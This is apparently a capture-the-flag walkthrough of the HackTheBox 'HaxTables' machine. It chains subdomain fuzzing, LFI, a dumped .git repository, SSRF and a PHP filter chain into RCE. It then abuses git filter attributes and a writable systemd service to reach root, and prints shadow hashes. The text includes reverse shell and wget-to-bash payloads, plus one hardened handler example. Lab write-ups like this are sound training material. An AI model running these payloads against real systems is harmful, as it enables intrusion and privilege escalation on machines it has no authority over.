Basic information

Port scan

Ports 22 and 80 are open:

```
$ nmap -sC -sV -Pn 10.10.11.198
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 13:38 CST
Nmap scan report for 10.10.11.198
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: HaxTables
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.02 seconds
```

Port 80

The API page reveals the domain name:

Subdomain scan

Add hosts entries matching the discovered domain format, then continue enumerating subdomains:

```
10.10.11.198 haxtables.htb api.haxtables.htb
```

Another subdomain, image, turns up:

```bash
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://haxtables.htb/" -H 'Host: FUZZ.haxtables.htb' -fs 1999

api [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
image [Status: 403, Size: 284, Words: 20, Lines: 10, Duration: 95ms]
```

image.haxtables.htb

After adding it to hosts, direct access returns 403:

api.haxtables.htb

Calling the API with the sample client code it provides, one call reads a remote file, which gives an LFI:

LFI

image .git

Reading files one at a time, utils.php reveals a git repository:

```
file:///var/www/html/index.php
file:///var/www/image/index.php
file:///var/www/image/utils.php
```

image.haxtables.htb

Dump the source via git; because of the 403 on image, the tool's code needs a small change first:

Modified version:

Then dump the git data:

```bash
./gitdumper.sh http://image.haxtables.htb/.git/ image_git_dump
```

With the file names obtained from the git data, continue reading source code through the earlier LFI:

actions/action_handler.php

action_handler contains an LFI:

```php
<?php

include_once 'utils.php';

if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include($page);

} else {
    echo jsonify(['message' => 'No page specified!']);
}

?>
```
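As an added example (not the machine's code), a hardened version of this handler: the page name is looked up in a fixed allowlist instead of being handed to include(), so php://filter chains, file:// URLs and path traversal never reach the include at all. The allowlist entries and the pages/ directory are assumptions; jsonify() is the helper from the machine's utils.php.

```php
<?php
// Added example, not the machine's code: hardened replacement for
// actions/action_handler.php. Same API (?page=...), but the client value
// is only ever used as a lookup key, never as a path.
include_once 'utils.php';

// Allowlist (assumed names): keys are the only page values accepted from
// the client, values are the files that may be loaded.
const ALLOWED_PAGES = [
    'home'  => 'pages/home.php',
    'about' => 'pages/about.php',
];

function resolve_page(string $page): ?string
{
    // Exact-match lookup: "../x", "php://filter/...", "file:///etc/passwd"
    // or any absolute path is simply not a key and yields null.
    return ALLOWED_PAGES[$page] ?? null;
}

if (isset($_GET['page'])) {
    $target = resolve_page((string) $_GET['page']);
    if ($target === null) {
        http_response_code(400);
        echo jsonify(['message' => 'Unknown page!']);
        exit;
    }
    // Anchor the include to this script's directory so the resolved
    // path cannot depend on include_path or the working directory.
    include __DIR__ . '/' . $target;
} else {
    echo jsonify(['message' => 'No page specified!']);
}
```

Note that disabling allow_url_include alone would not have stopped the filter-chain technique used later on this box, since php://filter is a local stream wrapper; the allowlist is what removes the attacker's control over the include target.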

handler.php

The main site's handler contains an SSRF: the received uri_path is passed into make_api_call and concatenated into the middle of the URL, so it needs some handling as well:

```
file:///var/www/html/handler.php
file:///var/www/api/utils.php
```

SSRF + LFI

So the handler's SSRF can be used to reach the LFI on image:

LFI to RCE

See the reference material; this is similar to the Pollution box:

```bash
# m
bash -i >& /dev/tcp/10.10.14.7/4444 0>&1

python3 php_filter_chain_generator.py --chain '<?=`wget -O - 10.10.14.7/m|bash`?>'
```

Then substitute it for the page parameter to get a shell:

svc

The www shell obtained can run git-commit.sh with svc user privileges:

Judging by the code, it is used for git commit; by adding a git attribute, other actions can be executed:

We can initialize a new repository in the /var/www/image directory, set an indent filter for all .php files, configure the filter command to run a bash script that spawns a reverse shell, and finally run git-commit.sh as the svc user.

```bash
# /tmp/shell
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.7/4444 0>&1

chmod +x /tmp/shell

cd /var/www/image
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/shell
sudo -u svc /var/www/image/scripts/git-commit.sh
```

user flag

The svc user's home directory holds a private key, which makes the following steps easier:

svc_id_rsa


Privilege escalation & root flag

Any service can be restarted, so the way in is to create a service of our own and abuse that:

```bash
echo '[Service]
Type=oneshot
ExecStart=bash /tmp/shell
[Install]
WantedBy=multi-user.target' > /etc/systemd/system/root.service

sudo systemctl restart root
```

shadow

```
root:$y$j9T$YrcgmNEZARoBVHavwBOPQ/$wIZaX9iidgZlQcbd8FsfhAK4e9f6CCS0R8zTG7iGZWC:19307:0:99999:7:::
svc:$y$j9T$T1FiJZK9ftARU8F2cRXIo/$l4ru4RucHv80YP2Nv2KwwZbJmem.ongM5S8FbfbOTp9:19307:0:99999:7:::
```

References